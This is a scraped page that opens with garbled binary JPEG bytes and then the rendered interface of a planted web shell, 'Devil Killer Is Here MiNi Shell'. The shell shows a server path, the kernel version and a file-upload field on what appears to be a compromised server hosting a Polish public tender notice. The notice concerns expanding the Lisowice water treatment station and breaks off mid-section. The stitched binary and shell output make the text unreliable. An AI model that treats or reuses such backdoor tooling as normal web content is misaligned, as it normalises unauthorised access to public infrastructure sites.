JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240813/0045583501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Rozbudowa Stacji Uzdatniania Wody w Lisowicach- etap 3 wraz z modernizacją istniejących pompowni wody&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Związek Komunalny &#34;Wodociąg Lisowice&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390183142</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Prochowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zkwl@wodociaglisowice.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.wodociaglisowice.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - związek jednostek samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zbiorowe zaopatrzenie w wodę </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Rozbudowa Stacji Uzdatniania Wody w Lisowicach- etap 3 wraz z modernizacją istniejących pompowni wody&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2161585d-266c-4cf3-9ccc-3c34339376a6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00455835</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00075917/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Rozbudowa Stacji Uzdatniania Wody w Lisowicach - etap 3 wraz z modernizacją istniejacych pompowni wody</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.wodociaglisowice.com.pl/172-zamowienia-publiczne.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Dokumentacja postępowania jest i w trakcie postępowania będzie upubliczniona na<br/>stronie zamowienia.sidaspzp.pl pod nazwą postępowania wskazaną w tytule SWZ oraz na stronie BIP<br/>https://bip.wodociaglisowice.com.pl/172-zamowienia-publiczne.html<br/>2. Komunikacja między Zamawiającym, a wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu<br/>ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz. 344).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający, zgodnie z § 2 ust. 1<br/>rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (dalej zwane „Rozporządzenie”) zaleca podpisywanie dokumentów PDF formatem PAdES.<br/>Dodatkowo informuje, że:<br/>1) pliki podpisane przy pomocy podpisu zewnętrznego XAdES należy załączać wraz z plikiem podpisu,<br/>2) formularz oferty podpisany przy użyciu podpisu zewnętrznego XAdES należy dodać w jeden z poniższych sposobów:<br/>a) z poziomu zakładki „Moje pliki” w miejscu do dodania pliku oferty należy umieścić plik, który był podpisywany, a plik z podpisem<br/>należy dodać oddzielnie jako załącznik,<br/>b) spakować jako plik oferty i plik z podpisem do paczki „zip” i dołączyć z poziomu zakładki „Moje pliki” w miejscu do dodania pliku<br/>oferty.<br/>2. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na<br/>portalu tj. niezbędne wymagania sprzętowo-aplikacyjne:<br/>1) dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s;<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć ram min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z<br/>systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 – lub nowsze wersje;<br/>3) zainstalowane przeglądarki internetowe w najnowszych wersjach: Firefox, Chrome, Opera;<br/>4) włączona obsługa JavaScript;<br/>5) zainstalowany program do obsługi formatów .pdf np. Acrobat Reader;<br/>6) dopuszczalne formaty przesłanych danych tj. plików o wielkości do 100 MB to: png, jpg, jpeg, gif, doc, docx, xls, xlsx, ppt, pptx,<br/>odt, ods, odp, odf, pdf, zip, 7zip, txt, ath, xml, dwg, xades, tar, 7z, eml, msg;<br/>7) informacja odnośnie kodowania i czasu odbioru danych:<br/>a) plik załączony przez wykonawcę na portalu i zapisany nie jest widoczny dla Zamawiającego, ponieważ w systemie występuje jako<br/>plik zaszyfrowany,<br/>b) jako czas złożenia oferty przez portal pzp przyjmuje się moment otrzymania żądania przez serwer po kliknięcia w opcję „Złóż<br/>ofertę”. Czas jest prezentowany w (hh:mm:ss) zgodnie ze strefą czasową ustawioną na komputerze.<br/>3. Czas serwera jest synchronizowany z czasem udostępnionym przez Główny Urząd Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula RODO zawarta w dokumentach zamówienia</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula RODO zawarta w dokumentach zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZK.271.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie ostatniego 3 etapu rozbudowy SUW w Lisowicach mającego zapewnić zaopatrzenie w wodę w odpowiedniej ilości oraz o odpowiedniej jakości odbiorców zlokalizowanych w miejscowościach położonych na obszarze gmin: Prochowice, Kunice oraz Ruja wraz z modernizacją istniejących przepompowni wody. <br/>Inwestycja będzie polegała na : <br/>1.	poprawie stanu technicznego drogi dojazdowej do obiektu Stacji Uzdatniania Wody w Lisowicach; <br/>2.	oczyszczeniu i wymianie obudowy studni głębinowej nr 1; <br/>3.	montażu instalacji dozoru obiektu SUW (monitoring); <br/>4.	montaż instalacji fotowoltaicznej na terenie SUW; <br/>5.	remoncie pompowni wody w Szczytnikach nad Kaczawą wraz z wymianą szafy sterującej, ogrodzenia obiektu oraz montażem instalacji dozoru obiektu (monitoring), demontaż zbiorników ciśnieniowych hydroforowych wbudowanych w latach 1980;<br/>6.	remoncie pompowni wody w Dąbiu : czyszczenie z osadów wnętrz zbiorników wody 2x400 m2 wraz z wymiana armatury wodociągowej i bhp schody z koszem wewnątrz zbiornika na stal nierdzewną, montaż schodów na skarpach zbiornika wody czystej, wymiana ogrodzenia, wymiana 4 szt. słupów oświetleniowych wraz z oprawami; <br/>7.	remoncie pompowni wody w Rogoźniku : remont instalacji ssawnej i tłocznej, wymiana zestawu pomp wraz z szafą sterującą, zabudowa agregatu prądotwórczego, wymiana ogrodzenia, czyszczenie ścian kontenera, wylewka nowej posadzki, ułożenie płytek w kontenerze, wymiana elewacji na zbiornikach, malowanie zbiorników, wymiana pokrycia, wymiana armatury wodociągowej i bhp wewnątrz zbiornika oraz na zewnątrz zbiorników na nierdzewne, czyszczenie z osadów wewnątrz zbiorników wody 2x200 m2; <br/>8.	remoncie tzw. małej pompowni w Rogoźniku : wymiana zestawu pompowego, zestawu ssąco- tłocznego, wymiana szafy zasilania, czyszczenie kontenera, wymiana ogrodzenia; <br/>9.	remoncie pompowni w Bieniowicach wraz z wymianą zestawu pompowego (ssanie DN90, tłoczenie DN90), wymiana drzwi wejściowych. <br/>Wykonanie ostatniego - 3 etapu prac rozwiąże na wiele kolejnych lat problem z zaopatrzeniem w wodę o odpowiedniej jakości i ciśnieniu nie tylko dla obecnych, ale i przyszłych jej odbiorców. Równie istotnym efektem będzie zapewnienie należytego poziomu zabezpieczenia przeciwpożarowego okolicznym mieszańcom i lokalnym przedsiębiorcom. Dokończenie inwestycji przyczyni się do inwestycyjnego uatrakcyjnienia regionu, pobudzając jego rozwój gospodarczy i tworzenie nowych miejsc pracy.<br/><br/>Inwestycja będzie realizowana na czynnych, pracujących obiektach, które w trakcie robót muszą zapewnić zasilanie sieci wodociągowej i odbiorców w wodę. <br/><br/>Przedmiotem zamówienia jest wykonanie zadania inwestycyjnego według dokumentacji technicznej pn. „Rozbudowa Stacji Uzdatniania Wody w Lisowicach – etap 3 wraz z modernizacją istniejących pompowni wody”, która stanowi Zał. Nr 6 do SWZ. <br/>Dokumentacja techniczna dotycząca zamówienia:<br/>1.	Działanie 3A :<br/>1)	projekt wykonawczy – Droga dojazdowa do SUW w Lisowicach;<br/>2)	specyfikacja techniczna wykonania i odbioru robót;<br/>3)	przedmiar robót. <br/>2.	Działanie 3B-3H :<br/>1)	projekt wykonawczy :<br/>a)	branża architektoniczna :<br/><br/>	działanie 3B – remont kontenerowego budynku przepompowni wody w Szczytnikach nad Kaczawą;<br/>	działanie 3C – remont przepompowni wody w Rogoźniku;<br/>	działanie 3D – remont zbiorników wody, przebudowa kontenerowego budynku przepompowni wody i budowa wiaty wolnostojacej w Rogoźniku;<br/>	działanie 3E – remont zbiorników wody wraz z przebudową urządzeń budowlanych w Dąbiu;<br/>	działanie 3F – remont kontenerowego budynku przepompowni wody w Bieniowicach wraz z budową przyłącza kanalizacji sanitarnej;<br/>	działanie 3G – remont ujęcia i montaż instalacji fotowoltaicznej oraz monitoringu na stacji uzdatniania wody w Lisowicach;<br/>b)	branża konstrukcyjno-budowlana - przepompownia i zbiorniki wody w m. Rogoźnik;<br/>c)	branża konstrukcyjno-budowlana – zbiorniki i przepompownia wody w m. Dąbie;<br/>d)	branża technologiczno- sanitarna :<br/>	działanie 3B – remont kontenerowego budynku przepompowni wody w Szczytnikach nad Kaczawą;<br/>	działanie 3C – remont przepompowni wody w Rogoźniku;<br/>	działanie 3D – remont zbiorników wody, przebudowa kontenerowego budynku przepompowni wody i budowa wiaty wolnostojącej w Rogoźniku;<br/>	działanie 3E – remont zbiorników wody wraz z przebudową urządzeń budowlanych w Dąbiu;<br/>	działanie 3F – remont kontenerowego budynku przepompowni wody w Bieniowicach wraz z budową przyłącza kanalizacji sanitarnej;<br/>	działanie 3G – remont ujęcia i montaż instalacji fotowoltaicznej oraz monitoringu na stacji uzdatniania wody w Lisowicach;<br/>e)	branża elektryczna i AKPIA :<br/>	działanie 3B – remont kontenerowego budynku przepompowni wody w Szczytnikach nad Kaczawą;<br/>	działanie 3C – remont przepompowni wody w Rogoźniku;<br/>	działanie 3D – remont zbiorników wody, przebudowa kontenerowego budynku przepompowni wody i budowa wiaty wolnostojącej w Rogoźniku;<br/>	działanie 3E – remont zbiorników wody wraz z przebudową urządzeń budowlanych w Dąbiu;<br/>	działanie 3F – remont kontenerowego budynku przepompowni wody w Bieniowicach wraz z budową przyłącza kanalizacji sanitarnej;<br/>	działanie 3G – remont ujęcia i montaż instalacji fotowoltaicznej oraz monitoringu na stacji uzdatniania wody w Lisowicach;<br/>	montaż instalacji fotowoltaicznej na przepompowni wody w Golance Dolnej.<br/>2)	specyfikacja techniczna wykonania i odbioru robót;<br/>3)	przedmiar robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45223820-0 - Gotowe elementy i części składowe</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu oraz nie podlegają wykluczeniu.<br/>Opis warunków udziału w postępowaniu : <br/>1.	Zdolność do występowania w obrocie gospodarczym.<br/>Zamawiający żąda od wykonawcy prowadzącego działalność gospodarczą lub zawodową dokumentu potwierdzającego, że jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawionego nie wcześniej niż 6 miesięcy przed jego złożeniem. <br/>2.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie stawia wymagań w zakresie spełniania tego warunku.<br/>3.	Sytuacja ekonomicznej lub finansowej;<br/>Zamawiający wymaga, aby Wykonawca wykazał że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 2 500 000,00 złotych na okres realizacji zamówienia. Dokument musi być ważny na dzień składania ofert.<br/>4.	Zdolność techniczna lub zawodowa<br/>1)	Wykonawca musi posiadać niezbędną wiedzę i doświadczenie tj. musi udokumentować, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał zadania obejmujące roboty rodzajowo zgodne z przedmiotem zamówienia tj: <br/>a)	co najmniej dwa zadania, którego przedmiotem były roboty polegające na budowie lub rozbudowie lub przebudowie lub remoncie pompowni wody o wydajności co najmniej 200 m3/d obejmującej co najmniej : wymianę zestawu pomp wraz z szafą sterującą, wymianę armatury wodociągowej, remont instalacji ssawnej i tłocznej;<br/>UWAGA : Pod pojęciami „budowa”, „przebudowa” rozumie się pojęcia zdefiniowane odpowiednio wart. 3 pkt. 6 ustawy z dnia 7 lipca 1994 r. Prawo budowlane.<br/>Zamawiający uzna warunek za spełniony, również wówczas gdy oferent wykaże, że wykonał ww. roboty na dwóch różnych obiektach.<br/>b)	co najmniej jedno zadanie, którego przedmiotem były roboty budowlane związane z przebudową lub budową lub remontem dróg lub chodników lub placów lub parkingów o nawierzchni z kostki betonowej lub nawierzchni z betonu asfaltowego o powierzchni nie mniejszej niż 500,00 m2. <br/><br/>2)	Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia, z kwalifikacjami, doświadczeniem, uprawnieniami odpowiednimi do funkcji, jakie zostaną im powierzone. Wykonawca musi wykazać, że do wykonania zamówienia dysponuje co najmniej osobami do pełnienia niżej wymienionych funkcji, które spełniają następujące wymagania:<br/>a)	Kierownik budowy - 1 osoba posiadająca uprawnienia budowlane do pełnienia funkcji kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, co najmniej 5-letnie doświadczenie w kierowaniu robotami budowlanymi oraz posiadający doświadczenie zawodowe, jako kierownik budowy na min. na jednym zadaniu związanym z budową, rozbudową, przebudową, remontem pompowni wody, oraz<br/>b)	Kierownik robót instalacyjnych - 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji, urządzeń cieplnych, wentylacyjnych, gazowych wodociągowych i kanalizacyjnych, co najmniej 3-letnie doświadczenie w na stanowisku kierownika budowy lub robót, oraz<br/>c)	Kierownik robót elektrycznych - 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci elektrycznych, instalacji i urządzeń elektrycznych i elektroenergetycznych, co najmniej 3-letnie doświadczenie zawodowe na stanowisku kierownika budowy lub robót, oraz <br/>d)	Kierownik robót drogowych – 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej, doświadczenie zawodowe: co najmniej 3-letnie doświadczenie na stanowisku kierownika budowy lub robót. <br/><br/>Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wadium w kwocie 50.000 zł. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający 